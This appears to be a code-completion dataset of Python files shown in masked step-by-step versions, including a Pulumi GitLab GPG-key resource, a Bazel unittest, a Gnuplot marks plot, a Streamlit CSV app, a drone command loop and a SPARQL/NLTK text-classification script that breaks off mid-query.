An admin token is required if `user_id` is specified.\n example_user_gpg_key = gitlab.UserGpgKey(\"exampleUserGpgKey\",\n user_id=example_user.id,\n key=\\\"\\\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\\\"\\\"\\\")\n # Manages a GPG key for the current user\n example_user_user_gpg_key = gitlab.UserGpgKey(\"exampleUserUserGpgKey\", key=\\\"\\\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\\\"\\\"\\\")\n ```\n\n ## Import\n\n You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1\n ```\n\n Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1\n ```\n\n :param str resource_name: The name of the resource.\n :param UserGpgKeyArgs args: The arguments to use to populate this resource's properties.\n :param pulumi.ResourceOptions opts: Options for the resource.\n \"\"\"\n ...\n def __init__(__self__, resource_name: str, *args, **kwargs):\n resource_args, opts = _utilities.get_resource_args_opts(UserGpgKeyArgs, pulumi.ResourceOptions, *args, **kwargs)\n if resource_args is not None:\n __self__._internal_init(resource_name, opts, **resource_args.__dict__)\n else:\n __self__._internal_init(resource_name, *args, **kwargs)\n\n def _internal_init(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n key: Optional[pulumi.Input[str]] = None,\n user_id: Optional[pulumi.Input[int]] = None,\n __props__=None):\n opts = pulumi.ResourceOptions.merge(_utilities.get_resource_opts_defaults(), opts)\n if not isinstance(opts, pulumi.ResourceOptions):\n raise TypeError('Expected resource options to be a ResourceOptions instance')\n if opts.id is None:\n if __props__ is not None:\n raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')\n __props__ = UserGpgKeyArgs.__new__(UserGpgKeyArgs)\n\n if key is None and not opts.urn:\n raise TypeError(\"Missing required property 'key'\")\n __props__.__dict__[\"key\"] = key\n __props__.__dict__[\"user_id\"] = user_id\n __props__.__dict__[\"created_at\"] = None\n __props__.__dict__[\"key_id\"] = None\n super(UserGpgKey, __self__).__init__(\n 'gitlab:index/userGpgKey:UserGpgKey',\n resource_name,\n __props__,\n opts)\n\n @staticmethod\n def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n created_at: Optional[pulumi.Input[str]] = None,\n key: Optional[pulumi.Input[str]] = None,\n key_id: Optional[pulumi.Input[int]] = None,\n user_id: Optional[pulumi.Input[int]] = None) -> 'UserGpgKey':\n \"\"\"\n Get an existing UserGpgKey resource's state with the given name, id, and optional extra\n properties used to qualify the lookup.\n\n :param str resource_name: The unique name of the resulting resource.\n :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.\n :param pulumi.ResourceOptions opts: Options for the resource.\n :param pulumi.Input[str] created_at: The time when this key was created in GitLab.\n :param pulumi.Input[str] key: The armored GPG public key.\n :param pulumi.Input[int] key_id: The ID of the GPG key.\n :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. 
Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _UserGpgKeyState.__new__(_UserGpgKeyState)\n\n __props__.__dict__[\"created_at\"] = created_at\n __props__.__dict__[\"key\"] = key\n __props__.__dict__[\"key_id\"] = key_id\n __props__.__dict__[\"user_id\"] = user_id\n return UserGpgKey(resource_name, opts=opts, __props__=__props__)\n\n @property\n @pulumi.getter(name=\"createdAt\")\n def created_at(self) -> pulumi.Output[str]:\n \"\"\"\n The time when this key was created in GitLab.\n \"\"\"\n return pulumi.get(self, \"created_at\")\n\n @property\n @pulumi.getter\n def key(self) -> pulumi.Output[str]:\n \"\"\"\n The armored GPG public key.\n \"\"\"\n return pulumi.get(self, \"key\")\n\n @property\n @pulumi.getter(name=\"keyId\")\n def key_id(self) -> pulumi.Output[int]:\n \"\"\"\n The ID of the GPG key.\n \"\"\"\n return pulumi.get(self, \"key_id\")\n\n @property\n @pulumi.getter(name=\"userId\")\n def user_id(self) -> pulumi.Output[Optional[int]]:\n \"\"\"\n The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n return pulumi.get(self, \"user_id\")\n\n",
"step-ids": [
11,
19,
22,
26,
29
]
}
|
[
11,
19,
22,
26,
29
] |
<|reserved_special_token_0|>
class TestGetNumber(unittest.TestCase):
    <|reserved_special_token_0|>

    def test_fib(self):
        self.assertEqual(Fib(5), 8)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestGetNumber(unittest.TestCase):
    def test_ok(self):
        self.assertEqual(GetNumber(), 42)

    def test_fib(self):
        self.assertEqual(Fib(5), 8)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestGetNumber(unittest.TestCase):
    def test_ok(self):
        self.assertEqual(GetNumber(), 42)

    def test_fib(self):
        self.assertEqual(Fib(5), 8)


if __name__ == '__main__':
    unittest.main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import unittest
from bazel_tutorial.examples.py.lib import GetNumber
from bazel_tutorial.examples.py.fibonacci.fib import Fib
class TestGetNumber(unittest.TestCase):
    def test_ok(self):
        self.assertEqual(GetNumber(), 42)

    def test_fib(self):
        self.assertEqual(Fib(5), 8)


if __name__ == '__main__':
    unittest.main()
<|reserved_special_token_1|>
"""A tiny example binary for the native Python rules of Bazel."""
import unittest
from bazel_tutorial.examples.py.lib import GetNumber
from bazel_tutorial.examples.py.fibonacci.fib import Fib
class TestGetNumber(unittest.TestCase):
    def test_ok(self):
        self.assertEqual(GetNumber(), 42)

    def test_fib(self):
        self.assertEqual(Fib(5), 8)

if __name__ == '__main__':
    unittest.main()
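# Hedged usage sketch (annotation, not part of the original test file): this
# unittest module is written for Bazel's native Python rules, so it would
# normally run as a py_test target; the label below is an assumed example,
# since the BUILD file is not shown here:
#
#   bazel test //bazel_tutorial/examples/py:test
#
# Outside Bazel it also runs directly, provided the imported packages are on
# PYTHONPATH:
#
#   python -m unittest bazel_tutorial.examples.py.test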
|
flexible
|
{
"blob_id": "d126efa91b964a3a374d546bb860b39ae26dfa22",
"index": 256,
"step-1": "<mask token>\n\n\nclass TestGetNumber(unittest.TestCase):\n <mask token>\n\n def test_fib(self):\n self.assertEqual(Fib(5), 8)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestGetNumber(unittest.TestCase):\n\n def test_ok(self):\n self.assertEqual(GetNumber(), 42)\n\n def test_fib(self):\n self.assertEqual(Fib(5), 8)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestGetNumber(unittest.TestCase):\n\n def test_ok(self):\n self.assertEqual(GetNumber(), 42)\n\n def test_fib(self):\n self.assertEqual(Fib(5), 8)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "<mask token>\nimport unittest\nfrom bazel_tutorial.examples.py.lib import GetNumber\nfrom bazel_tutorial.examples.py.fibonacci.fib import Fib\n\n\nclass TestGetNumber(unittest.TestCase):\n\n def test_ok(self):\n self.assertEqual(GetNumber(), 42)\n\n def test_fib(self):\n self.assertEqual(Fib(5), 8)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "\"\"\"A tiny example binary for the native Python rules of Bazel.\"\"\"\n\nimport unittest\nfrom bazel_tutorial.examples.py.lib import GetNumber\nfrom bazel_tutorial.examples.py.fibonacci.fib import Fib\n\n\nclass TestGetNumber(unittest.TestCase):\n\n def test_ok(self):\n self.assertEqual(GetNumber(), 42)\n\n def test_fib(self):\n self.assertEqual(Fib(5), 8)\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
##########################################################################
#
# Draw a 2-D plot for student registration number and the marks secured using gnuplot
#
##########################################################################
import Gnuplot
# create lists to store student marks and regno
student_reg=[]
student_marks=[]
# get the register numbers and marks of the students
n = int(input("Enter number of students: "))
for i in range(0,n):
    reg = int(input("Enter RegNo: "))
    student_reg.append(reg)
    marks=int(input("Enter marks: "))
    student_marks.append(marks)
# plot students regno. and students marks
gplt = Gnuplot.Gnuplot(persist=1)
gplt.title("RegNo. V/S Marks")
gplt.xlabel("Student RegNo--->")
gplt.ylabel("Student Marks--->")
d=Gnuplot.Data(student_reg,student_marks,with_="line")
gplt.plot(d)
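# Hedged portability note (annotation, not part of the original script): the
# Gnuplot.py bindings need a separately installed gnuplot binary and
# historically targeted Python 2. Assuming matplotlib is available instead,
# the same line plot could be drawn as:
#
#   import matplotlib.pyplot as plt
#   plt.plot(student_reg, student_marks)
#   plt.title("RegNo. V/S Marks")
#   plt.xlabel("Student RegNo--->")
#   plt.ylabel("Student Marks--->")
#   plt.show()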
|
normal
|
{
"blob_id": "dcbbc7098410d771a7151af7c43ac4d0e4d46f18",
"index": 9135,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(0, n):\n reg = int(input('Enter RegNo: '))\n student_reg.append(reg)\n marks = int(input('Enter marks: '))\n student_marks.append(marks)\n<mask token>\ngplt.title('RegNo. V/S Marks')\ngplt.xlabel('Student RegNo--->')\ngplt.ylabel('Student Marks--->')\n<mask token>\ngplt.plot(d)\n",
"step-3": "<mask token>\nstudent_reg = []\nstudent_marks = []\nn = int(input('Enter number of students: '))\nfor i in range(0, n):\n reg = int(input('Enter RegNo: '))\n student_reg.append(reg)\n marks = int(input('Enter marks: '))\n student_marks.append(marks)\ngplt = Gnuplot.Gnuplot(persist=1)\ngplt.title('RegNo. V/S Marks')\ngplt.xlabel('Student RegNo--->')\ngplt.ylabel('Student Marks--->')\nd = Gnuplot.Data(student_reg, student_marks, with_='line')\ngplt.plot(d)\n",
"step-4": "import Gnuplot\nstudent_reg = []\nstudent_marks = []\nn = int(input('Enter number of students: '))\nfor i in range(0, n):\n reg = int(input('Enter RegNo: '))\n student_reg.append(reg)\n marks = int(input('Enter marks: '))\n student_marks.append(marks)\ngplt = Gnuplot.Gnuplot(persist=1)\ngplt.title('RegNo. V/S Marks')\ngplt.xlabel('Student RegNo--->')\ngplt.ylabel('Student Marks--->')\nd = Gnuplot.Data(student_reg, student_marks, with_='line')\ngplt.plot(d)\n",
"step-5": "##########################################################################\n#\n# Draw a 2-D plot for student registration number and the marks secured using gnuplot \n#\n##########################################################################\n\n\nimport Gnuplot\n\n# create lists to store student marks and regno\nstudent_reg=[]\nstudent_marks=[]\n\n\n# get the register numbers and marks of the students\nn = int(input(\"Enter number of students: \"))\nfor i in range(0,n):\n\treg = int(input(\"Enter RegNo: \"))\n\tstudent_reg.append(reg)\n\tmarks=int(input(\"Enter marks: \"))\n\tstudent_marks.append(marks)\n\n# plot students regno. and students marks\ngplt = Gnuplot.Gnuplot(persist=1)\ngplt.title(\"RegNo. V/S Marks\")\ngplt.xlabel(\"Student RegNo--->\")\ngplt.ylabel(\"Student Marks--->\")\nd=Gnuplot.Data(student_reg,student_marks,with_=\"line\")\n\ngplt.plot(d)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if button == True:
    df = pd.read_csv(upload)
    st.write(df.head())
    fig = plt.figure()
    my = fig.add_subplot(1, 1, 1)
    my.scatter(df['sepal.length'], df['petal.length'])
    my.set_xlabel('sepal.length')
    my.set_ylabel('petal.length')
    st.write(fig)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
username = st.text_input('username')
upload = st.file_uploader('uploadfile', type=['csv'])
button = st.button('submit')
if button == True:
    df = pd.read_csv(upload)
    st.write(df.head())
    fig = plt.figure()
    my = fig.add_subplot(1, 1, 1)
    my.scatter(df['sepal.length'], df['petal.length'])
    my.set_xlabel('sepal.length')
    my.set_ylabel('petal.length')
    st.write(fig)
<|reserved_special_token_1|>
import streamlit as st
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
username = st.text_input('username')
upload = st.file_uploader('uploadfile', type=['csv'])
button = st.button('submit')
if button == True:
    df = pd.read_csv(upload)
    st.write(df.head())
    fig = plt.figure()
    my = fig.add_subplot(1, 1, 1)
    my.scatter(df['sepal.length'], df['petal.length'])
    my.set_xlabel('sepal.length')
    my.set_ylabel('petal.length')
    st.write(fig)
<|reserved_special_token_1|>
import streamlit as st
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
username=st.text_input ("username")
upload=st.file_uploader("uploadfile",type=['csv'])
button=st.button("submit")
if button==True:
    df=pd.read_csv(upload)
    st.write(df.head())
    fig = plt.figure()
    my = fig.add_subplot(1,1,1)
    my.scatter(df["sepal.length"],df["petal.length"],)
    my.set_xlabel("sepal.length")
    my.set_ylabel("petal.length")
    st.write(fig)
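# Hedged usage note (annotation, not part of the original app): Streamlit
# apps are launched from the command line; assuming this file is saved as
# app.py:
#
#   streamlit run app.py
#
# The uploaded CSV is expected to contain 'sepal.length' and 'petal.length'
# columns (the dotted iris headers used above); otherwise the df[...] lookups
# raise a KeyError.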
|
flexible
|
{
"blob_id": "72f1547ea7de78a5fe4b583523e592fa25c0ee77",
"index": 2467,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif button == True:\n df = pd.read_csv(upload)\n st.write(df.head())\n fig = plt.figure()\n my = fig.add_subplot(1, 1, 1)\n my.scatter(df['sepal.length'], df['petal.length'])\n my.set_xlabel('sepal.length')\n my.set_ylabel('petal.length')\n st.write(fig)\n",
"step-3": "<mask token>\nusername = st.text_input('username')\nupload = st.file_uploader('uploadfile', type=['csv'])\nbutton = st.button('submit')\nif button == True:\n df = pd.read_csv(upload)\n st.write(df.head())\n fig = plt.figure()\n my = fig.add_subplot(1, 1, 1)\n my.scatter(df['sepal.length'], df['petal.length'])\n my.set_xlabel('sepal.length')\n my.set_ylabel('petal.length')\n st.write(fig)\n",
"step-4": "import streamlit as st\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nusername = st.text_input('username')\nupload = st.file_uploader('uploadfile', type=['csv'])\nbutton = st.button('submit')\nif button == True:\n df = pd.read_csv(upload)\n st.write(df.head())\n fig = plt.figure()\n my = fig.add_subplot(1, 1, 1)\n my.scatter(df['sepal.length'], df['petal.length'])\n my.set_xlabel('sepal.length')\n my.set_ylabel('petal.length')\n st.write(fig)\n",
"step-5": "import streamlit as st\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nusername=st.text_input (\"username\")\r\nupload=st.file_uploader(\"uploadfile\",type=['csv'])\r\nbutton=st.button(\"submit\")\r\nif button==True:\r\n df=pd.read_csv(upload)\r\n st.write(df.head())\r\n fig = plt.figure()\r\n my = fig.add_subplot(1,1,1)\r\n my.scatter(df[\"sepal.length\"],df[\"petal.length\"],)\r\n my.set_xlabel(\"sepal.length\")\r\n my.set_ylabel(\"petal.length\")\r\n st.write(fig)\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# wilfred.py
# Authors
# Stuart C. Larsen (SCL)
# Daryl W. Bennet (DWB)
# Set up three main modules (command, control, reconnaissance),
# and then enter main event loop.
#
# Command:
# Gather mission priorities and objectives, such as turn left, turn right
# goto GPS 45, 65, land, take off.
#
# Control:
# Fly the craft to complete the command objective.
#
# Reconnaissance:
# Gather information about wilfreds current position.
#
# Main Event Loop:
# Check command listing for new updates, check reconnaisannce for current
# posistion, and then control the craft to the correct zone. Main loop will
# be a very fast feedback loop.
import command
import driver
from debug import *
def mainLoop():
    wilfredCommunication = command.Command()
    wilfredCommunication.waitForClient()

    wilfredCommand = command.Command()

    while True:
        if not wilfredCommunication.checkConnection():
            wilfredCommunication.waitForClient()
        commands = wilfredCommunication.getCommand()

        for commandData in commands.split('\n'):
            cmd = commandData.split(' ')[0].strip()
            if cmd == "": continue
            args = [arg.strip() for arg in commandData.split(' ')[1:]]

            # setMotorSpeed (0-3) (0-100)
            if cmd == "setMotorSpeed":
                motorNum = int(args[0])
                motorSpeed = int(args[1])
                wilfredCommand.setMotorSpeed(motorNum, motorSpeed)
            elif cmd == "playMeow":
                goodMessage("wilfred: playing meow from file: ", args[0])
                wilfredCommand.playMeow(args[0])
            elif cmd == "getAccel":
                goodMessage("wilfred: returning acceleration...")
                wilfredCommunication.sendMessage("(0, 0, 0)")
            else:
                errorMessage("wilfred: command not recognized: ", cmd, ": ", args)


if __name__ == "__main__":
    mainLoop()
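# Hedged parsing sketch (annotation, not part of the original module): the
# protocol handled by mainLoop() can be exercised without a client socket by
# feeding it one line of the same wire format; every name below mirrors the
# loop's own parsing, nothing new is assumed.
#
#   line = "setMotorSpeed 2 75"
#   cmd = line.split(' ')[0].strip()                  # -> "setMotorSpeed"
#   args = [a.strip() for a in line.split(' ')[1:]]   # -> ["2", "75"]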
|
normal
|
{
"blob_id": "a77fb90cdc6e7f9b70f9feeefc2b7f8e93a2d8c5",
"index": 9875,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef mainLoop():\n wilfredCommunication = command.Command()\n wilfredCommunication.waitForClient()\n wilfredCommand = command.Command()\n while True:\n if not wilfredCommunication.checkConnection():\n wilfredCommunication.waitForClient()\n commands = wilfredCommunication.getCommand()\n for commandData in commands.split('\\n'):\n cmd = commandData.split(' ')[0].strip()\n if cmd == '':\n continue\n args = [arg.strip() for arg in commandData.split(' ')[1:]]\n if cmd == 'setMotorSpeed':\n motorNum = int(args[0])\n motorSpeed = int(args[1])\n wilfredCommand.setMotorSpeed(motorNum, motorSpeed)\n elif cmd == 'playMeow':\n goodMessage('wilfred: playing meow from file: ', args[0])\n wilfredCommand.playMeow(args[0])\n elif cmd == 'getAccel':\n goodMessage('wilfred: returning acceleration...')\n wilfredCommunication.sendMessage('(0, 0, 0)')\n else:\n errorMessage('wilfred: command not recognized: ', cmd, ': ',\n args)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef mainLoop():\n wilfredCommunication = command.Command()\n wilfredCommunication.waitForClient()\n wilfredCommand = command.Command()\n while True:\n if not wilfredCommunication.checkConnection():\n wilfredCommunication.waitForClient()\n commands = wilfredCommunication.getCommand()\n for commandData in commands.split('\\n'):\n cmd = commandData.split(' ')[0].strip()\n if cmd == '':\n continue\n args = [arg.strip() for arg in commandData.split(' ')[1:]]\n if cmd == 'setMotorSpeed':\n motorNum = int(args[0])\n motorSpeed = int(args[1])\n wilfredCommand.setMotorSpeed(motorNum, motorSpeed)\n elif cmd == 'playMeow':\n goodMessage('wilfred: playing meow from file: ', args[0])\n wilfredCommand.playMeow(args[0])\n elif cmd == 'getAccel':\n goodMessage('wilfred: returning acceleration...')\n wilfredCommunication.sendMessage('(0, 0, 0)')\n else:\n errorMessage('wilfred: command not recognized: ', cmd, ': ',\n args)\n\n\nif __name__ == '__main__':\n mainLoop()\n",
"step-4": "import command\nimport driver\nfrom debug import *\n\n\ndef mainLoop():\n wilfredCommunication = command.Command()\n wilfredCommunication.waitForClient()\n wilfredCommand = command.Command()\n while True:\n if not wilfredCommunication.checkConnection():\n wilfredCommunication.waitForClient()\n commands = wilfredCommunication.getCommand()\n for commandData in commands.split('\\n'):\n cmd = commandData.split(' ')[0].strip()\n if cmd == '':\n continue\n args = [arg.strip() for arg in commandData.split(' ')[1:]]\n if cmd == 'setMotorSpeed':\n motorNum = int(args[0])\n motorSpeed = int(args[1])\n wilfredCommand.setMotorSpeed(motorNum, motorSpeed)\n elif cmd == 'playMeow':\n goodMessage('wilfred: playing meow from file: ', args[0])\n wilfredCommand.playMeow(args[0])\n elif cmd == 'getAccel':\n goodMessage('wilfred: returning acceleration...')\n wilfredCommunication.sendMessage('(0, 0, 0)')\n else:\n errorMessage('wilfred: command not recognized: ', cmd, ': ',\n args)\n\n\nif __name__ == '__main__':\n mainLoop()\n",
"step-5": "# wilfred.py\n# Authors\n# Stuart C. Larsen (SCL)\n# Daryl W. Bennet (DWB)\n\n# Set up three main modules (command, control, reconnaissance),\n# and then enter main event loop.\n#\n# Command:\n# Gather mission priorities and objectives, such as turn left, turn right\n# goto GPS 45, 65, land, take off.\n#\n# Control:\n# Fly the craft to complete the command objective.\n#\n# Reconnaissance:\n# Gather information about wilfreds current position.\n#\n# Main Event Loop:\n# Check command listing for new updates, check reconnaisannce for current\n# posistion, and then control the craft to the correct zone. Main loop will\n# be a very fast feedback loop.\n\nimport command\nimport driver\nfrom debug import *\n\ndef mainLoop():\n wilfredCommunication = command.Command()\n wilfredCommunication.waitForClient()\n\n wilfredCommand = command.Command()\n\n while True:\n if not wilfredCommunication.checkConnection():\n wilfredCommunication.waitForClient()\n commands = wilfredCommunication.getCommand()\n \n\n for commandData in commands.split('\\n'):\n cmd = commandData.split(' ')[0].strip()\n if cmd == \"\": continue\n args = [arg.strip() for arg in commandData.split(' ')[1:]]\n \n \n # setMotorSpeed (0-3) (0-100)\n if cmd == \"setMotorSpeed\":\n motorNum = int(args[0])\n motorSpeed = int(args[1])\n wilfredCommand.setMotorSpeed(motorNum, motorSpeed)\n elif cmd == \"playMeow\":\n goodMessage(\"wilfred: playing meow from file: \", args[0])\n wilfredCommand.playMeow(args[0])\n elif cmd == \"getAccel\":\n goodMessage(\"wilfred: returning acceleration...\")\n wilfredCommunication.sendMessage(\"(0, 0, 0)\")\n else:\n errorMessage(\"wilfred: command not recognized: \", cmd, \": \", args)\n \n\nif __name__ == \"__main__\":\n mainLoop()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def document_features(documento):
    features = {}
    for palavra in palavras_escolhidas:
        features['contains(%s)' % (palavra,)] = palavra in documento
    return features
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sparql.setQuery(
"""
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
SELECT ?label
WHERE { <http://dbpedia.org/resource/Love> rdfs:label ?label }
"""
)
sparql.setReturnFormat(JSON)
<|reserved_special_token_0|>
print('%.2f segundos para consultar a dbpedia' % (time.time() - NOW,))
for result in results['results']['bindings']:
    print(result['label']['value'] + ', ' + result['label']['xml:lang'])
<|reserved_special_token_0|>
sparql3.setQuery(PREFIX + q2)
sparql3.setReturnFormat(JSON)
<|reserved_special_token_0|>
print(
'%.2f segundos para puxar todos os nomes dos participantes do Participa.br'
% (time.time() - NOW,))
for i in results3['results']['bindings'][-10:]:
    print(u'participante: ' + i['nome']['value'])
<|reserved_special_token_0|>
sparql3.setQuery(PREFIX + q)
sparql3.setReturnFormat(JSON)
<|reserved_special_token_0|>
print('%.2f segundos para puxar todos os comentários do Participa.br' % (
time.time() - NOW,))
<|reserved_special_token_0|>
print('dados lidos, processando')
<|reserved_special_token_0|>
print('feita primeira freq dist em %.2f' % (time.time() - NOW,))
<|reserved_special_token_0|>
print('feita segunda freq dist (retiradas stopwords) em %.2f' % (time.time(
) - NOW,))
<|reserved_special_token_0|>
def document_features(documento):
    features = {}
    for palavra in palavras_escolhidas:
        features['contains(%s)' % (palavra,)] = palavra in documento
    return features
<|reserved_special_token_0|>
random.shuffle(msgs_)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
NOW = time.time()
sparql = SPARQLWrapper('http://dbpedia.org/sparql')
sparql.setQuery(
"""
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
SELECT ?label
WHERE { <http://dbpedia.org/resource/Love> rdfs:label ?label }
"""
)
sparql.setReturnFormat(JSON)
results = sparql.query().convert()
print('%.2f segundos para consultar a dbpedia' % (time.time() - NOW,))
for result in results['results']['bindings']:
    print(result['label']['value'] + ', ' + result['label']['xml:lang'])
PREFIX = """PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
PREFIX ops: <http://purl.org/socialparticipation/ops#>
PREFIX opa: <http://purl.org/socialparticipation/opa#>
PREFIX foaf: <http://xmlns.com/foaf/0.1/>
PREFIX dc: <http://purl.org/dc/terms/>
PREFIX tsioc: <http://rdfs.org/sioc/types#>
PREFIX schema: <http://schema.org/>
"""
q2 = 'SELECT ?nome WHERE {?s rdf:type ops:Participant . ?s foaf:name ?nome .}'
NOW = time.time()
sparql3 = SPARQLWrapper('http://localhost:82/participabr/query')
sparql3.setQuery(PREFIX + q2)
sparql3.setReturnFormat(JSON)
results3 = sparql3.query().convert()
print(
'%.2f segundos para puxar todos os nomes dos participantes do Participa.br'
% (time.time() - NOW,))
for i in results3['results']['bindings'][-10:]:
    print(u'participante: ' + i['nome']['value'])
NOW = time.time()
q = (
'SELECT ?comentario ?titulo ?texto WHERE {?comentario dc:type tsioc:Comment. OPTIONAL {?comentario dc:title ?titulo . } OPTIONAL {?comentario schema:text ?texto .}}'
)
sparql3.setQuery(PREFIX + q)
sparql3.setReturnFormat(JSON)
results4 = sparql3.query().convert()
print('%.2f segundos para puxar todos os comentários do Participa.br' % (
time.time() - NOW,))
NOW = time.time()
print('dados lidos, processando')
<|reserved_special_token_0|>
palavras = string.join([i['texto']['value'].lower() for i in results4[
'results']['bindings']])
exclude = set(string.punctuation)
palavras = ''.join(ch for ch in palavras if ch not in exclude)
palavras_ = palavras.split()
print('feita primeira freq dist em %.2f' % (time.time() - NOW,))
NOW = time.time()
stopwords = set(k.corpus.stopwords.words('portuguese'))
palavras__ = [pp for pp in palavras_ if pp not in stopwords]
fdist_ = k.FreqDist(palavras__)
print('feita segunda freq dist (retiradas stopwords) em %.2f' % (time.time(
) - NOW,))
palavras_escolhidas = fdist_.keys()[:200]
def document_features(documento):
    features = {}
    for palavra in palavras_escolhidas:
        features['contains(%s)' % (palavra,)] = palavra in documento
    return features
msgs = [(rr['texto']['value'], 'pos') for rr in results4['results'][
'bindings'][:1000]]
msgs2 = [(rr['texto']['value'], 'neg') for rr in results4['results'][
'bindings'][1000:2000]]
msgs_ = msgs + msgs2
random.shuffle(msgs_)
feature_sets = [(document_features(msg[0]), msg[1]) for msg in msgs_]
train_set, test_set = feature_sets[1000:], feature_sets[:1000]
classifier = k.NaiveBayesClassifier.train(train_set)
<|reserved_special_token_1|>
from SPARQLWrapper import SPARQLWrapper, SPARQLWrapper2, JSON
import time, random
NOW = time.time()
sparql = SPARQLWrapper('http://dbpedia.org/sparql')
sparql.setQuery(
"""
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
SELECT ?label
WHERE { <http://dbpedia.org/resource/Love> rdfs:label ?label }
"""
)
sparql.setReturnFormat(JSON)
results = sparql.query().convert()
print('%.2f segundos para consultar a dbpedia' % (time.time() - NOW,))
for result in results['results']['bindings']:
    print(result['label']['value'] + ', ' + result['label']['xml:lang'])
PREFIX = """PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
PREFIX ops: <http://purl.org/socialparticipation/ops#>
PREFIX opa: <http://purl.org/socialparticipation/opa#>
PREFIX foaf: <http://xmlns.com/foaf/0.1/>
PREFIX dc: <http://purl.org/dc/terms/>
PREFIX tsioc: <http://rdfs.org/sioc/types#>
PREFIX schema: <http://schema.org/>
"""
q2 = 'SELECT ?nome WHERE {?s rdf:type ops:Participant . ?s foaf:name ?nome .}'
NOW = time.time()
sparql3 = SPARQLWrapper('http://localhost:82/participabr/query')
sparql3.setQuery(PREFIX + q2)
sparql3.setReturnFormat(JSON)
results3 = sparql3.query().convert()
print(
'%.2f segundos para puxar todos os nomes dos participantes do Participa.br'
% (time.time() - NOW,))
for i in results3['results']['bindings'][-10:]:
    print(u'participante: ' + i['nome']['value'])
NOW = time.time()
q = (
'SELECT ?comentario ?titulo ?texto WHERE {?comentario dc:type tsioc:Comment. OPTIONAL {?comentario dc:title ?titulo . } OPTIONAL {?comentario schema:text ?texto .}}'
)
sparql3.setQuery(PREFIX + q)
sparql3.setReturnFormat(JSON)
results4 = sparql3.query().convert()
print('%.2f segundos para puxar todos os comentários do Participa.br' % (
time.time() - NOW,))
NOW = time.time()
print('dados lidos, processando')
import string, nltk as k
palavras = string.join([i['texto']['value'].lower() for i in results4[
'results']['bindings']])
exclude = set(string.punctuation)
palavras = ''.join(ch for ch in palavras if ch not in exclude)
palavras_ = palavras.split()
print('feita primeira freq dist em %.2f' % (time.time() - NOW,))
NOW = time.time()
stopwords = set(k.corpus.stopwords.words('portuguese'))
palavras__ = [pp for pp in palavras_ if pp not in stopwords]
fdist_ = k.FreqDist(palavras__)
print('feita segunda freq dist (retiradas stopwords) em %.2f' % (time.time(
) - NOW,))
palavras_escolhidas = fdist_.keys()[:200]
def document_features(documento):
features = {}
for palavra in palavras_escolhidas:
features['contains(%s)' % (palavra,)] = palavra in documento
return features
msgs = [(rr['texto']['value'], 'pos') for rr in results4['results'][
'bindings'][:1000]]
msgs2 = [(rr['texto']['value'], 'neg') for rr in results4['results'][
'bindings'][1000:2000]]
msgs_ = msgs + msgs2
random.shuffle(msgs_)
feature_sets = [(document_features(msg[0]), msg[1]) for msg in msgs_]
train_set, test_set = feature_sets[1000:], feature_sets[:1000]
classifier = k.NaiveBayesClassifier.train(train_set)
<|reserved_special_token_1|>
#-*- coding: utf-8 -*-
from SPARQLWrapper import SPARQLWrapper, SPARQLWrapper2, JSON
import time, random
# tests
NOW=time.time()
sparql = SPARQLWrapper("http://dbpedia.org/sparql")
sparql.setQuery("""
